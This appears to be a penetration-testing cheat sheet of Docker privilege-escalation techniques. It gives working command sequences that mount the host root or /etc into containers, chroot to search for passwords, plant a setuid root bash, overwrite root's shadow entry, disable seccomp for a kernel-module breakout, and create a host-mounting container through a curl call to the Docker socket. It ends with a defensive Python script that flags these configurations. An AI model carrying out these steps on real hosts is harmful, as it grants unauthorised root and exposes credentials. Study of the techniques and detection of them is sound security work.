Docker-Related Attack Vectors
Docker Socket
If you have user privileges on a host machine, check these:
Find the docker socket:
netstat -tunape
If the docker socket is listening on localhost, export it to the environment:
export DOCKER_HOST="tcp://localhost:2222"
List the docker images on the host machine and run one with the host filesystem mounted:
docker run -it -v /:/host ubuntu:20.04 bash
cd /host/
chroot ./ bash
find / -name password
Portainer Web UI access
If you have Portainer access (via leaked creds or brute force):
Create a privileged container via the Portainer web UI.
Then connect to it from the Portainer web UI and run:
mount /dev/sda /mnt
cd /mnt
chroot ./ bash
Then look for credentials in the mounted root filesystem.
Use Case (Privileged mode blocked, but seccomp can still be set)
You are a user on the victim machine, want to get root, and are blocked by the docker firewall when you run:
docker run -d --privileged ubuntu:latest
Then you can run:
docker run -d --security-opt "seccomp=unconfined" modified-ubuntu
This way we start a container with the seccomp profile set to unconfined.
docker exec -it --privileged {container_id} bash
Check it with capsh --print.
Then use the cap_sys_module breakout technique to break out of the container.
Use Case (Blocked by Docker Firewall API)
In this case you are a user on the host machine and are trying to get root by using docker.
Check this command:
docker run -it --privileged ubuntu:18.04 bash
If it is blocked by the Docker firewall, then:
cp /bin/bash /tmp/
docker run -it -v /tmp:/host ubuntu:18.04 bash
In the container:
chown root:root /host/bash
chmod u+s /host/bash
Then exit.
On the host machine itself, run:
/tmp/bash -p
Your effective uid is now 0.
Use Case (Blocked by Docker Firewall API - 2)
In this case you are a user on the host machine and are trying to get root by using docker.
Check this command:
docker run -it --privileged ubuntu:18.04 bash
If it is blocked by the Docker firewall, then:
Test it with /tmp, /etc:
docker run -it -v /etc:/host ubuntu:18.04 bash
Check the /host directory.
Then create a password entry with openssl:
openssl passwd -1 -salt abc abc
Take that string and put it in /host/shadow, in root's entry.
Then exit the container; on the host machine, become root with the password you used in the openssl command.
Use Case (Blocked by Docker Firewall API - 3 [Using Docker API])
In this case you are a user on the host machine and are trying to get root by using docker.
Check this command:
docker run -it --privileged ubuntu:18.04 bash
If it is blocked by the Docker firewall, then:
When the docker client is used, it interacts with the docker socket through the HTTP API; the JSON data sent by the docker client follows the format documented in the Docker API reference. Identify the API version used by the docker client.
So by sending requests to the docker socket directly, we can talk to docker.
Send this request with curl:
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "Binds":["/:/host"]}' http:/v1.40/containers/create
and it will create a privileged container for us via the API request.
Check it via:
docker ps -a
Start the container: docker start container_id
and run: docker exec -it container_id bash
Now check the /host directory; you are in the host machine's filesystem.
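From the defender's side, as an added example that is not part of the original notes: every use case above leaves a trace in docker inspect output (Privileged, seccomp=unconfined, an added capability, or a sensitive host path bind-mounted), and this script flags those patterns. The sample inspect JSON and the container names in it are constructed for the example.

```python
import json

# Host paths whose bind-mount into a container is equivalent to host root:
# the use cases above mount /, /etc and /tmp; the socket itself is worse.
SENSITIVE_SOURCES = {"/", "/etc", "/tmp", "/var/run/docker.sock", "/run/docker.sock"}
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "ALL"}

def _norm(path):
    """Strip trailing slashes so '/etc/' and '/etc' compare equal; keep '/' as '/'."""
    return path.rstrip("/") or "/"

def audit_container(c):
    """Findings for one `docker inspect` record (a dict), as (severity, reason) tuples."""
    findings = []
    hc = c.get("HostConfig") or {}
    if hc.get("Privileged"):
        findings.append(("high", "privileged container"))
    for opt in hc.get("SecurityOpt") or []:
        if opt.replace(":", "=").lower() == "seccomp=unconfined":
            findings.append(("high", "seccomp profile unconfined"))
    for cap in hc.get("CapAdd") or []:
        if cap.upper().replace("CAP_", "", 1) in DANGEROUS_CAPS:
            findings.append(("high", f"added capability {cap}"))
    # Bind mounts appear both as HostConfig.Binds ("src:dst[:opts]") and in Mounts[].
    sources = [b.split(":", 1)[0] for b in hc.get("Binds") or []]
    sources += [m.get("Source", "") for m in c.get("Mounts") or [] if m.get("Type") == "bind"]
    for src in sorted({_norm(s) for s in sources}):
        if src in SENSITIVE_SOURCES:
            findings.append(("high", f"host path {src} bind-mounted"))
    return findings

def audit_inspect_output(inspect_json):
    """Map container name -> findings for the JSON array printed by `docker inspect $(docker ps -aq)`."""
    return {c.get("Name", "?").lstrip("/"): audit_container(c) for c in json.loads(inspect_json)}

# Constructed sample, not a real inspect dump: a benign web container and one
# matching the "Binds":["/:/host"] + seccomp=unconfined pattern from the notes above.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "HostConfig": {"Privileged": False, "Binds": ["webdata:/usr/share/nginx/html"],
                                    "SecurityOpt": None, "CapAdd": None}, "Mounts": []},
    {"Name": "/modified-ubuntu", "HostConfig": {"Privileged": False, "Binds": ["/:/host"],
                                                "SecurityOpt": ["seccomp=unconfined"], "CapAdd": ["SYS_MODULE"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}]},
])

if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name, findings or "ok")
```

Run it against real output by piping `docker inspect $(docker ps -aq)` into audit_inspect_output; a non-empty result for any container is a host-root-equivalent configuration worth alerting on.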
Some Docker Rest API Commands that can be used